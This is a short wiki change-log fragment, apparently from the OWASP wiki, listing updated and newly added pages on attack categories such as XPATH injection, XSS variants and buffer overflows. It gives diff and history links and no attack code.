* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&diff=22962&oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&action=history history])<br />
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&diff=22963&oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&action=history history])<br />
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&diff=22965&oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&action=history history])<br />
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&diff=22936&oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&action=history history])<br />
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&diff=22937&oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&action=history history])<br />
<br />
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):<br />
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&action=history history])<br />
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&action=history history])<br />
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&action=history history])</div>Nsrav